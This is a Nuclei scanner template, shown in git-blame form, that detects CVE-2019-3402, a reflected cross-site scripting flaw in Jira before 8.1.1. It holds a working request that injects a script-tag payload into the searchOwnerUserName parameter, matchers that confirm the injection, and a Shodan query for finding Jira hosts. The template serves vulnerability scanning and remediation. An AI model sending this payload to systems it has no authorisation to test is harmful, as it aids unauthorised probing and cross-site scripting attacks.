nuclei-templates/http/cves/2019/CVE-2019-3402.yaml

55 lines
1.9 KiB
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-3402
2020-11-06 10:28:11 +00:00
info:
2022-10-26 06:24:30 +00:00
name: Jira < 8.1.1 - Cross-Site Scripting
2020-11-06 10:28:11 +00:00
author: pdteam
severity: medium
2022-10-26 06:24:30 +00:00
description: |
Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, data theft, or defacement.
2023-09-06 12:53:28 +00:00
remediation: |
Upgrade Jira to version 8.1.1 or later to mitigate this vulnerability.
reference:
- https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
- https://jira.atlassian.com/browse/JRASERVER-69243
- https://nvd.nist.gov/vuln/detail/CVE-2019-3402
- https://github.com/ARPSyndicate/cvemon
- https://github.com/Faizee-Asad/JIRA-Vulnerabilities
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-3402
cwe-id: CWE-79
epss-score: 0.00238
epss-percentile: 0.61128
2023-09-06 12:53:28 +00:00
cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
2022-07-04 13:18:38 +00:00
metadata:
2022-10-26 06:24:30 +00:00
verified: true
2023-09-06 12:53:28 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: atlassian
product: jira
2023-09-06 12:53:28 +00:00
shodan-query: http.component:"Atlassian Jira"
tags: cve,cve2019,atlassian,jira,xss
2020-11-06 10:28:11 +00:00
http:
2020-11-06 10:28:11 +00:00
- method: GET
path:
2021-06-09 18:31:38 +00:00
- "{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"
2020-11-06 10:28:11 +00:00
matchers-condition: and
matchers:
2022-10-26 06:24:30 +00:00
- type: word
part: body
words:
- "'<script>alert(1)</script>' does not exist"
- type: word
part: header
words:
- text/html
2020-11-06 10:28:11 +00:00
- type: status
status:
- 200
# digest: 4a0a004730450220014cda7bcb0ca01f99e7973644e2e5adc52e573eb4a187b16147779932dd310a022100c354c44a90929adfb0657f0a0c37506bfcdb64c5cb077c00d8fdd6c4d873f7d9:922c64590222798bb761d5b6d8e72950